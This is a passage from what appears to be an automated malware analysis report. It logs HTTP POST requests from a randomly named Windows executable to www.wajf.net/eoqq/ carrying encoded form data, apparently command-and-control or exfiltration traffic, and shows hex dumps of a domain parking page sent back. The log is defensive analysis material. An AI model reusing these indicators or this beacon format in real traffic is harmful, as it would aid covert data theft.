                                                                                                                                                                                                              Oct 8, 2024 15:36:31.833578110 CEST1236INData Raw: 35 33 2d 33 33 2e 32 39 36 32 37 2d 33 34 2e 39 36 32 33 35 56 31 30 35 2e 35 32 36 63 30 2d 32 31 2e 37 33 31 31 39 2c 31 30 2e 38 36 35 36 2d 33 34 2e 39 36 34 2c 33 33 2e 32 39 36 32 37 2d 33 34 2e 39 36 34 41 31 31 38 2e 38 30 37 37 39 2c 31
                                                                                                                                                                                                              Data Ascii: 53-33.29627-34.96235V105.526c0-21.73119,10.8656-34.964,33.29627-34.964A118.80779,118.80779,0,0,1,581.4102,74.1828c3.20332.83607,3.76519,1.67248,3.76519,3.76216V149.8214C585.17539,169.60389,575.14452,177.95924,553.83389,177.95924ZM566.7858,86.8
                                                                                                                                                                                                              Oct 8, 2024 15:36:31.833610058 CEST1236INData Raw: 2e 39 39 30 32 63 30 2c 35 2e 35 37 35 36 32 2c 32 2e 35 30 36 38 38 2c 36 2e 35 34 38 32 39 2c 38 2e 34 39 33 33 2c 36 2e 35 34 38 32 39 48 37 31 33 2e 38 34 34 63 31 2e 38 31 33 34 35 2c 30 2c 32 2e 39 32 34 30 37 2e 36 39 36 34 35 2c 32 2e 39
                                                                                                                                                                                                              Data Ascii: .9902c0,5.57562,2.50688,6.54829,8.4933,6.54829H713.844c1.81345,0,2.92407.69645,2.92407,2.08968v8.63763C716.76805,148.9833,715.93366,149.8214,714.11987,150.10066Z" class="cls-1"></path><path d="M523.55018,5.59211l4.971,2.86822a1.29783,1.29783,0
                                                                                                                                                                                                              Oct 8, 2024 15:36:31.833632946 CEST1236INData Raw: 2d 31 2e 37 36 31 2e 34 32 33 39 32 4c 34 35 33 2e 34 31 38 35 35 2c 33 30 2e 34 30 38 35 33 61 31 2e 32 35 34 32 33 2c 31 2e 32 35 34 32 33 2c 30 2c 30 2c 31 2d 2e 34 35 36 39 2d 31 2e 37 30 33 37 38 6c 32 2e 38 36 35 31 39 2d 34 2e 39 36 36 33
                                                                                                                                                                                                              Data Ascii: -1.761.42392L453.41855,30.40853a1.25423,1.25423,0,0,1-.4569-1.70378l2.86519-4.96631a1.25738,1.25738,0,0,1,1.70849-.45656l22.19448,12.81733A1.30449,1.30449,0,0,1,480.24559,37.83394Z" class="cls-2"></path><path d="M490.17148,30.00412l-4.96463,2.
                                                                                                                                                                                                              Oct 8, 2024 15:36:31.833647966 CEST1236INData Raw: 2e 35 38 37 34 2c 35 2e 35 38 37 34 2c 30 2c 30 2c 31 2c 37 32 2e 37 31 31 31 38 2c 31 35 30 2e 31 30 30 36 36 5a 22 20 63 6c 61 73 73 3d 22 63 6c 73 2d 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 64 3d 22 4d 31 35 32 2e 38 31 36 34 39 2c 31
                                                                                                                                                                                                              Data Ascii: .5874,5.5874,0,0,1,72.71118,150.10066Z" class="cls-2"></path><path d="M152.81649,147.59344a118.76528,118.76528,0,0,1-27.99855,3.62086c-22.42764,0-33.28988-13.23453-33.28988-34.96235V105.526c0-21.73119,10.86224-34.964,33.28988-34.964a118.86956,
                                                                                                                                                                                                              Oct 8, 2024 15:36:31.833668947 CEST1236INData Raw: 33 34 33 32 39 63 31 37 2e 36 39 31 34 36 2c 30 2c 32 38 2e 31 33 37 38 34 2c 39 2e 30 35 35 31 37 2c 32 38 2e 31 33 37 38 34 2c 32 36 2e 36 30 35 36 35 76 35 30 2e 30 30 35 32 39 41 32 2e 38 30 34 33 36 2c 32 2e 38 30 34 33 36 2c 30 2c 30 2c 31
                                                                                                                                                                                                              Data Ascii: 34329c17.69146,0,28.13784,9.05517,28.13784,26.60565v50.00529A2.80436,2.80436,0,0,1,267.18568,150.10066Z" class="cls-2"></path><path d="M344.50486,117.228H299.0941v.42056c0,8.07577,3.345,17.68641,16.71576,17.68641,10.16713,0,19.78114-.83473,25.
                                                                                                                                                                                                              Oct 8, 2024 15:36:31.833697081 CEST1236INData Raw: 31 31 32 35 36 76 35 2e 32 37 39 38 38 63 30 2c 2e 38 31 31 38 34 2d 2e 36 34 37 33 33 2c 31 2e 32 31 35 39 32 2d 31 2e 34 35 38 38 34 2c 31 2e 32 31 35 39 32 68 2d 2e 32 34 36 32 38 61 37 30 2e 33 35 35 33 35 2c 37 30 2e 33 35 35 33 35 2c 30 2c
                                                                                                                                                                                                              Data Ascii: 11256v5.27988c0,.81184-.64733,1.21592-1.45884,1.21592h-.24628a70.35535,70.35535,0,0,0-10.48137-.56187c-3.81768,0-7.79988,2.1849-7.79988,10.6422v7.557c0,8.45056,3.9822,10.64186,7.79988,10.64186a70.19544,70.19544,0,0,0,10.48137-.56826h.24628c.81
                                                                                                                                                                                                              Oct 8, 2024 15:36:31.834307909 CEST421INData Raw: 31 2e 36 33 38 32 34 2c 30 2c 30 2c 31 2d 31 2e 35 34 37 33 33 2d 31 2e 37 31 31 38 35 56 31 31 39 2e 32 32 35 34 38 63 30 2d 31 30 2e 32 33 39 38 31 2c 36 2e 30 39 34 37 36 2d 31 35 2e 35 32 31 33 38 2c 31 36 2e 34 31 31 36 31 2d 31 35 2e 35 32
                                                                                                                                                                                                              Data Ascii: 1.63824,0,0,1-1.54733-1.71185V119.22548c0-10.23981,6.09476-15.52138,16.41161-15.52138h1.9551c4.55047,0,8.204,1.05814,10.72429,3.25111,2.51663-2.193,6.25256-3.25111,10.80638-3.25111h1.9514c10.31719,0,16.412,5.28157,16.412,15.52138v29.16333A1.63


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              38192.168.2.9608533.91.127.116801432C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Oct 8, 2024 15:36:33.909727097 CEST743OUTPOST /eoqq/ HTTP/1.1
                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                              Host: www.wajf.net
                                                                                                                                                                                                              Origin: http://www.wajf.net
                                                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                                                              Content-Length: 217
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                              Referer: http://www.wajf.net/eoqq/
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                                                                                                                                                              Data Raw: 74 70 54 64 3d 62 64 79 74 34 6e 39 61 44 55 49 66 30 30 70 36 33 73 41 49 47 63 68 35 64 35 55 7a 62 6a 41 59 74 74 68 34 73 64 46 66 41 77 68 4d 6b 79 47 50 72 69 75 37 6c 39 35 33 78 78 64 4a 78 4a 6f 74 58 36 65 69 46 38 62 4f 78 59 6f 48 70 7a 6c 68 34 53 77 69 44 47 7a 56 6c 46 6f 65 49 67 73 51 45 62 41 2b 69 71 39 61 55 53 67 41 6c 49 73 64 69 6c 78 52 50 46 6f 6a 56 64 43 4d 38 45 73 7a 6b 6f 79 44 35 72 6d 43 74 67 69 45 76 48 58 35 64 66 56 79 55 6f 4f 61 34 34 64 67 71 68 30 42 4c 77 45 6a 57 77 58 68 79 53 71 73 6f 4c 54 32 70 72 30 6f 32 51 6b 75 67 7a 34 57 77 33 38 79 54 6d 36 61 2b 7a 52 39 36 5a 77 65 67 34 55 63 46 41 3d 3d
                                                                                                                                                                                                              Data Ascii: tpTd=bdyt4n9aDUIf00p63sAIGch5d5UzbjAYtth4sdFfAwhMkyGPriu7l953xxdJxJotX6eiF8bOxYoHpzlh4SwiDGzVlFoeIgsQEbA+iq9aUSgAlIsdilxRPFojVdCM8EszkoyD5rmCtgiEvHX5dfVyUoOa44dgqh0BLwEjWwXhySqsoLT2pr0o2Qkugz4Ww38yTm6a+zR96Zweg4UcFA==
                                                                                                                                                                                                              Oct 8, 2024 15:36:34.378201962 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:36:34 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Data Raw: 33 31 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 61 6d 65 42 72 69 67 68 74 20 2d 20 43 6f 6d 69 6e 67 20 53 6f 6f 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 2c 20 64 69 76 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: 3151<!DOCTYPE html><html><head> <link rel="icon" href="data:,"> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>NameBright - Coming Soon</title> <style type="text/css"> body, div { box-sizing: border-box; } body { background-color: #f7f7f7; font: 18px sans-serif; } .page { display: flex; flex-direction: column; min-height: 100vh; height: 100%; } .wrapper { display: flex; flex-direction: column; min-height: 100vh; height: 100%; align-items: center; justify-content: center; } .container { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; width: 90vw; [TRUNCATED]
                                                                                                                                                                                                              Oct 8, 2024 15:36:34.378263950 CEST1236INData Raw: 74 3a 20 34 30 76 77 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 37 30 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 36 34 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                                                              Data Ascii: t: 40vw; max-height: 700px; min-height: 640px; background: #ffffff; border-radius: 1.5%; padding: 50px 5vw; } .main { display: flex;
                                                                                                                                                                                                              Oct 8, 2024 15:36:34.378325939 CEST1236INData Raw: 69 74 65 63 64 6e 2e 63 6f 6d 2f 6e 62 2f 63 64 6c 2f 63 6f 6d 69 6e 67 2d 73 6f 6f 6e 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6f 6d 6d 69 6e 67 20 73 6f 6f 6e 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22
                                                                                                                                                                                                              Data Ascii: itecdn.com/nb/cdl/coming-soon.png" alt="comming soon" /> <div class="main"> <h1>wajf.net is coming soon</h1> </div> <div>This domain is managed at <br> <a href="/
                                                                                                                                                                                                              Oct 8, 2024 15:36:34.378415108 CEST1236INData Raw: 2d 37 2e 36 36 30 35 39 2d 34 2e 30 33 38 2d 31 34 2e 37 36 34 2d 31 37 2e 31 33 34 36 34 2d 31 34 2e 37 36 34 48 33 37 38 2e 35 37 30 32 35 76 33 30 2e 36 34 36 37 34 63 33 2e 33 34 34 36 33 2c 30 2c 38 2e 34 39 36 36 36 2e 32 37 39 32 35 2c 31
                                                                                                                                                                                                              Data Ascii: -7.66059-4.038-14.764-17.13464-14.764H378.57025v30.64674c3.34463,0,8.49666.27925,11.42241.27925,17.82941,0,23.40032-4.59656,23.40032-14.34851Zm62.4236-33.0123a79.44713,79.44713,0,0,0-13.6487.9757v60.17443a2.80457,2.80457,0,0,1-2.64818,2.92778H
                                                                                                                                                                                                              Oct 8, 2024 15:36:34.378465891 CEST1236INData Raw: 35 33 2d 33 33 2e 32 39 36 32 37 2d 33 34 2e 39 36 32 33 35 56 31 30 35 2e 35 32 36 63 30 2d 32 31 2e 37 33 31 31 39 2c 31 30 2e 38 36 35 36 2d 33 34 2e 39 36 34 2c 33 33 2e 32 39 36 32 37 2d 33 34 2e 39 36 34 41 31 31 38 2e 38 30 37 37 39 2c 31
                                                                                                                                                                                                              Data Ascii: 53-33.29627-34.96235V105.526c0-21.73119,10.8656-34.964,33.29627-34.964A118.80779,118.80779,0,0,1,581.4102,74.1828c3.20332.83607,3.76519,1.67248,3.76519,3.76216V149.8214C585.17539,169.60389,575.14452,177.95924,553.83389,177.95924ZM566.7858,86.8
                                                                                                                                                                                                              Oct 8, 2024 15:36:34.378513098 CEST1236INData Raw: 2e 39 39 30 32 63 30 2c 35 2e 35 37 35 36 32 2c 32 2e 35 30 36 38 38 2c 36 2e 35 34 38 32 39 2c 38 2e 34 39 33 33 2c 36 2e 35 34 38 32 39 48 37 31 33 2e 38 34 34 63 31 2e 38 31 33 34 35 2c 30 2c 32 2e 39 32 34 30 37 2e 36 39 36 34 35 2c 32 2e 39
                                                                                                                                                                                                              Data Ascii: .9902c0,5.57562,2.50688,6.54829,8.4933,6.54829H713.844c1.81345,0,2.92407.69645,2.92407,2.08968v8.63763C716.76805,148.9833,715.93366,149.8214,714.11987,150.10066Z" class="cls-1"></path><path d="M523.55018,5.59211l4.971,2.86822a1.29783,1.29783,0
                                                                                                                                                                                                              Oct 8, 2024 15:36:34.378559113 CEST1236INData Raw: 2d 31 2e 37 36 31 2e 34 32 33 39 32 4c 34 35 33 2e 34 31 38 35 35 2c 33 30 2e 34 30 38 35 33 61 31 2e 32 35 34 32 33 2c 31 2e 32 35 34 32 33 2c 30 2c 30 2c 31 2d 2e 34 35 36 39 2d 31 2e 37 30 33 37 38 6c 32 2e 38 36 35 31 39 2d 34 2e 39 36 36 33
                                                                                                                                                                                                              Data Ascii: -1.761.42392L453.41855,30.40853a1.25423,1.25423,0,0,1-.4569-1.70378l2.86519-4.96631a1.25738,1.25738,0,0,1,1.70849-.45656l22.19448,12.81733A1.30449,1.30449,0,0,1,480.24559,37.83394Z" class="cls-2"></path><path d="M490.17148,30.00412l-4.96463,2.
                                                                                                                                                                                                              Oct 8, 2024 15:36:34.378607035 CEST1236INData Raw: 2e 35 38 37 34 2c 35 2e 35 38 37 34 2c 30 2c 30 2c 31 2c 37 32 2e 37 31 31 31 38 2c 31 35 30 2e 31 30 30 36 36 5a 22 20 63 6c 61 73 73 3d 22 63 6c 73 2d 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 64 3d 22 4d 31 35 32 2e 38 31 36 34 39 2c 31
                                                                                                                                                                                                              Data Ascii: .5874,5.5874,0,0,1,72.71118,150.10066Z" class="cls-2"></path><path d="M152.81649,147.59344a118.76528,118.76528,0,0,1-27.99855,3.62086c-22.42764,0-33.28988-13.23453-33.28988-34.96235V105.526c0-21.73119,10.86224-34.964,33.28988-34.964a118.86956,
                                                                                                                                                                                                              Oct 8, 2024 15:36:34.378653049 CEST1236INData Raw: 33 34 33 32 39 63 31 37 2e 36 39 31 34 36 2c 30 2c 32 38 2e 31 33 37 38 34 2c 39 2e 30 35 35 31 37 2c 32 38 2e 31 33 37 38 34 2c 32 36 2e 36 30 35 36 35 76 35 30 2e 30 30 35 32 39 41 32 2e 38 30 34 33 36 2c 32 2e 38 30 34 33 36 2c 30 2c 30 2c 31
                                                                                                                                                                                                              Data Ascii: 34329c17.69146,0,28.13784,9.05517,28.13784,26.60565v50.00529A2.80436,2.80436,0,0,1,267.18568,150.10066Z" class="cls-2"></path><path d="M344.50486,117.228H299.0941v.42056c0,8.07577,3.345,17.68641,16.71576,17.68641,10.16713,0,19.78114-.83473,25.
                                                                                                                                                                                                              Oct 8, 2024 15:36:34.378703117 CEST1236INData Raw: 31 31 32 35 36 76 35 2e 32 37 39 38 38 63 30 2c 2e 38 31 31 38 34 2d 2e 36 34 37 33 33 2c 31 2e 32 31 35 39 32 2d 31 2e 34 35 38 38 34 2c 31 2e 32 31 35 39 32 68 2d 2e 32 34 36 32 38 61 37 30 2e 33 35 35 33 35 2c 37 30 2e 33 35 35 33 35 2c 30 2c
                                                                                                                                                                                                              Data Ascii: 11256v5.27988c0,.81184-.64733,1.21592-1.45884,1.21592h-.24628a70.35535,70.35535,0,0,0-10.48137-.56187c-3.81768,0-7.79988,2.1849-7.79988,10.6422v7.557c0,8.45056,3.9822,10.64186,7.79988,10.64186a70.19544,70.19544,0,0,0,10.48137-.56826h.24628c.81
                                                                                                                                                                                                              Oct 8, 2024 15:36:34.378997087 CEST421INData Raw: 31 2e 36 33 38 32 34 2c 30 2c 30 2c 31 2d 31 2e 35 34 37 33 33 2d 31 2e 37 31 31 38 35 56 31 31 39 2e 32 32 35 34 38 63 30 2d 31 30 2e 32 33 39 38 31 2c 36 2e 30 39 34 37 36 2d 31 35 2e 35 32 31 33 38 2c 31 36 2e 34 31 31 36 31 2d 31 35 2e 35 32
                                                                                                                                                                                                              Data Ascii: 1.63824,0,0,1-1.54733-1.71185V119.22548c0-10.23981,6.09476-15.52138,16.41161-15.52138h1.9551c4.55047,0,8.204,1.05814,10.72429,3.25111,2.51663-2.193,6.25256-3.25111,10.80638-3.25111h1.9514c10.31719,0,16.412,5.28157,16.412,15.52138v29.16333A1.63


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              39192.168.2.9608543.91.127.116801432C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Oct 8, 2024 15:36:36.457803011 CEST1756OUTPOST /eoqq/ HTTP/1.1
                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                              Host: www.wajf.net
                                                                                                                                                                                                              Origin: http://www.wajf.net
                                                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                                                              Content-Length: 1229
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                              Referer: http://www.wajf.net/eoqq/
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                                                                                                                                                              Data Raw: 74 70 54 64 3d 62 64 79 74 34 6e 39 61 44 55 49 66 30 30 70 36 33 73 41 49 47 63 68 35 64 35 55 7a 62 6a 41 59 74 74 68 34 73 64 46 66 41 77 35 4d 6e 41 4f 50 70 41 47 37 6d 39 35 33 2f 52 64 4d 78 4a 70 78 58 36 57 75 46 38 58 30 78 61 67 48 76 51 39 68 39 6e 63 69 4e 47 7a 56 73 6c 6f 66 4d 67 73 2f 45 62 77 36 69 75 68 61 55 53 67 41 6c 4a 38 64 6e 41 64 52 4a 46 6f 67 44 74 43 59 34 45 74 63 6b 73 58 30 35 6f 4b 30 73 55 75 45 76 6a 4c 35 51 4a 35 79 64 6f 4f 69 2f 34 63 6d 71 68 6f 67 4c 30 6b 46 57 7a 4c 62 79 53 53 73 72 4e 79 65 75 61 34 65 6e 69 6b 6b 6e 52 4e 77 32 44 41 69 64 6e 6e 38 73 68 4e 62 37 49 4a 36 75 4b 64 67 58 5a 72 4c 34 47 51 4c 35 70 2b 70 6b 4c 6d 68 51 74 70 51 4e 45 67 43 41 41 42 58 50 56 6f 6b 62 6c 39 65 30 44 4b 46 39 6e 63 45 43 68 32 4d 50 42 49 47 33 4d 59 46 70 64 68 45 32 50 32 70 34 53 76 74 52 36 4a 30 35 36 5a 38 6d 58 67 2b 76 5a 69 77 7a 47 34 32 63 6a 4e 52 57 62 61 6f 72 33 43 4a 35 4e 6e 47 7a 59 34 57 63 46 59 7a 70 77 50 4b 64 41 70 63 59 7a 2b 59 2f [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: tpTd=bdyt4n9aDUIf00p63sAIGch5d5UzbjAYtth4sdFfAw5MnAOPpAG7m953/RdMxJpxX6WuF8X0xagHvQ9h9nciNGzVslofMgs/Ebw6iuhaUSgAlJ8dnAdRJFogDtCY4EtcksX05oK0sUuEvjL5QJ5ydoOi/4cmqhogL0kFWzLbySSsrNyeua4enikknRNw2DAidnn8shNb7IJ6uKdgXZrL4GQL5p+pkLmhQtpQNEgCAABXPVokbl9e0DKF9ncECh2MPBIG3MYFpdhE2P2p4SvtR6J056Z8mXg+vZiwzG42cjNRWbaor3CJ5NnGzY4WcFYzpwPKdApcYz+Y/2A1STymADjM4MaTD4onhMY5MJkz8Cfe0mXHBiJZ+KZhdMIbzQp7WIabjNCaMgXdL3VGXZTGhHrm15jKa7Hw83kY1arQLg4bspDjpSc7wOSM+SfrhynpBeoO9mnpCe8Hi32fQPRKb2AiYH0RREyrEp5mMlP9MvHkiFEOQao0ljP0EftFZQKbmbNeYk+LCLKD6j4MomtEEwxjqKH2YInNqfclHWK6BMN3zV/xzBLEC2NbR3oKoDmVmBzC3I+zbRK4QI0VLZgmdJD5JmfjRXtKxoxsrpCuxhQ1QzDLGAFqv+McrRa+NbOyU9K7BSQIPh3kQppTG7pS1nJt7pLxs9xkte8zN88+7+zEL6lZFeN/fDD1nq8nj0TCW8deYl3GPM6N2A8XDw41qjyIhKIq/Oc0cPzRYa0zynEwmvHY4Q/wVyA0e8IHDA7nTQ+d7F/zeOhbTeGa5BWeBkvadVu692L54IXOaJgF6K6yLAXQjJ6VTEMIaemgcc26+1XDnucE6MssGzmRAaoV3u84xPoQ2TfzpcaiBe+hkH2836+9uVSaWmUFKiEPilcYgBYNMWNnxxRMuMVaVPzRpmEw5wj3A6ApEivLJC2JGsGMqSxlhsC3TSPXxSnSlkZukedPm4flfhYuJtgO0lPiHmwxtl8fK06HiYGCJ/UhNTjSr3q [TRUNCATED]
                                                                                                                                                                                                              Oct 8, 2024 15:36:36.958839893 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:36:36 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Data Raw: 33 31 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 61 6d 65 42 72 69 67 68 74 20 2d 20 43 6f 6d 69 6e 67 20 53 6f 6f 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 2c 20 64 69 76 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: 3151<!DOCTYPE html><html><head> <link rel="icon" href="data:,"> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>NameBright - Coming Soon</title> <style type="text/css"> body, div { box-sizing: border-box; } body { background-color: #f7f7f7; font: 18px sans-serif; } .page { display: flex; flex-direction: column; min-height: 100vh; height: 100%; } .wrapper { display: flex; flex-direction: column; min-height: 100vh; height: 100%; align-items: center; justify-content: center; } .container { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; width: 90vw; [TRUNCATED]
                                                                                                                                                                                                              Oct 8, 2024 15:36:36.958864927 CEST1236INData Raw: 74 3a 20 34 30 76 77 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 37 30 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 36 34 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                                                              Data Ascii: t: 40vw; max-height: 700px; min-height: 640px; background: #ffffff; border-radius: 1.5%; padding: 50px 5vw; } .main { display: flex;
                                                                                                                                                                                                              Oct 8, 2024 15:36:36.958897114 CEST1236INData Raw: 69 74 65 63 64 6e 2e 63 6f 6d 2f 6e 62 2f 63 64 6c 2f 63 6f 6d 69 6e 67 2d 73 6f 6f 6e 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6f 6d 6d 69 6e 67 20 73 6f 6f 6e 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22
                                                                                                                                                                                                              Data Ascii: itecdn.com/nb/cdl/coming-soon.png" alt="comming soon" /> <div class="main"> <h1>wajf.net is coming soon</h1> </div> <div>This domain is managed at <br> <a href="/
                                                                                                                                                                                                              Oct 8, 2024 15:36:36.958915949 CEST1236INData Raw: 2d 37 2e 36 36 30 35 39 2d 34 2e 30 33 38 2d 31 34 2e 37 36 34 2d 31 37 2e 31 33 34 36 34 2d 31 34 2e 37 36 34 48 33 37 38 2e 35 37 30 32 35 76 33 30 2e 36 34 36 37 34 63 33 2e 33 34 34 36 33 2c 30 2c 38 2e 34 39 36 36 36 2e 32 37 39 32 35 2c 31
                                                                                                                                                                                                              Data Ascii: -7.66059-4.038-14.764-17.13464-14.764H378.57025v30.64674c3.34463,0,8.49666.27925,11.42241.27925,17.82941,0,23.40032-4.59656,23.40032-14.34851Zm62.4236-33.0123a79.44713,79.44713,0,0,0-13.6487.9757v60.17443a2.80457,2.80457,0,0,1-2.64818,2.92778H
                                                                                                                                                                                                              Oct 8, 2024 15:36:36.958930016 CEST1236INData Raw: 35 33 2d 33 33 2e 32 39 36 32 37 2d 33 34 2e 39 36 32 33 35 56 31 30 35 2e 35 32 36 63 30 2d 32 31 2e 37 33 31 31 39 2c 31 30 2e 38 36 35 36 2d 33 34 2e 39 36 34 2c 33 33 2e 32 39 36 32 37 2d 33 34 2e 39 36 34 41 31 31 38 2e 38 30 37 37 39 2c 31
                                                                                                                                                                                                              Data Ascii: 53-33.29627-34.96235V105.526c0-21.73119,10.8656-34.964,33.29627-34.964A118.80779,118.80779,0,0,1,581.4102,74.1828c3.20332.83607,3.76519,1.67248,3.76519,3.76216V149.8214C585.17539,169.60389,575.14452,177.95924,553.83389,177.95924ZM566.7858,86.8
                                                                                                                                                                                                              Oct 8, 2024 15:36:36.958949089 CEST1236INData Raw: 2e 39 39 30 32 63 30 2c 35 2e 35 37 35 36 32 2c 32 2e 35 30 36 38 38 2c 36 2e 35 34 38 32 39 2c 38 2e 34 39 33 33 2c 36 2e 35 34 38 32 39 48 37 31 33 2e 38 34 34 63 31 2e 38 31 33 34 35 2c 30 2c 32 2e 39 32 34 30 37 2e 36 39 36 34 35 2c 32 2e 39
                                                                                                                                                                                                              Data Ascii: .9902c0,5.57562,2.50688,6.54829,8.4933,6.54829H713.844c1.81345,0,2.92407.69645,2.92407,2.08968v8.63763C716.76805,148.9833,715.93366,149.8214,714.11987,150.10066Z" class="cls-1"></path><path d="M523.55018,5.59211l4.971,2.86822a1.29783,1.29783,0
                                                                                                                                                                                                              Oct 8, 2024 15:36:36.958982944 CEST1236INData Raw: 2d 31 2e 37 36 31 2e 34 32 33 39 32 4c 34 35 33 2e 34 31 38 35 35 2c 33 30 2e 34 30 38 35 33 61 31 2e 32 35 34 32 33 2c 31 2e 32 35 34 32 33 2c 30 2c 30 2c 31 2d 2e 34 35 36 39 2d 31 2e 37 30 33 37 38 6c 32 2e 38 36 35 31 39 2d 34 2e 39 36 36 33
